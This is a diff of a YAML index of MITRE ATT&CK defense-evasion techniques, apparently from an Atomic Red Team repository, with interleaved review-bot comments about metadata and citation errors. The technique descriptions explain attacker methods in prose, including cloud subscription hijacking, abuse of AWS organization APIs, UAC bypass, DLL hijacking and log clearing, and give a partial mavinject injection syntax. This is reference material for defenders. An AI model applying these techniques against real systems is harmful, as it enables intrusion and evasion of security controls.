+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
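Review bot: T1666 is added with `x_mitre_platforms: - IaaS` only, yet this file is saas-index.yaml; check the generator's platform-to-index mapping, because a pure IaaS technique should land in the IaaS index, and its presence here (alongside Windows-only T1218.011 and Linux/macOS T1556.003 already in this file) suggests the SaaS index is not actually filtered by platform. `x_mitre_detection: ''` and `atomic_tests: []` are expected for a newly created technique (created 2024-09-25) with no atomic yet; the description names `LeaveOrganization` and `CreateAccount` as the AWS calls, which are the obvious events to build a first atomic and its CloudTrail detection around.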
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
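Review bot: the modified timestamp for T1014 moves backwards here, from 2023-05-09T14:00:00.188Z to 2023-03-30T21:01:50.568Z. The old value's 14:00:00.188Z suffix is shared by the other rewinds in this patch (T1036.007, T1548.002, T1548.003, Mavinject, T1600, T1562.009 and more), which suggests the previous values were release-date stamps rather than true object modification times. If that is the reason, state it in the commit message, because any consumer that treats modified as monotonic will otherwise read these as regressions.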
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
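Review bot: this hunk drops x_mitre_attack_spec_version: 2.1.0 from T1036.007 along with spec_version, but unlike the T1574.011 hunks further down (which re-add x_mitre_attack_spec_version: 3.2.0 at the end of the object) nothing visible restores it. The same pattern appears for T1548.003, T1600, T1562.009, T1542.005, T1070.002, T1218.004 and T1600.001. If the upstream objects genuinely carry no attack spec version now, fine; otherwise the key was lost in the reorder and should be checked against the source bundle.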
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
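Review bot: the M-Trends 2020 URL changes from the fireeye.com landing page to a mandiant.com PDF, but "Retrieved April 24, 2020" is left unchanged, whereas the other URL swaps in this patch (the x.com links, the Deloitte Drive link) bump the retrieved date together with the URL. Either update the date here for consistency or keep the original URL; mixing the two makes the citation misleading.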
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
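Review bot: the extended description cites (Citation: AWS RE:Inforce Threat Detection 2024), and the later hunk in this object does add that source_name to external_references, so the key resolves. Separately, the unchanged context line just above the change reads "AADInternals zure AD Federated Domain", which looks like a dropped "A" in "Azure"; since this is a citation key it must match the corresponding source_name exactly, so check the reference entry before touching it.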
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
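Review bot: the new Hexacorn reference is complete and matches the citation key added in the description hunk above. The adjacent unchanged entry "Microsoft. (, May 23). Microsoft Security Advisory 2269637" has an empty year field; it is pre-existing, but since this change already touches this object's references it is a cheap fix if the advisory date is known, otherwise leave it.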
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
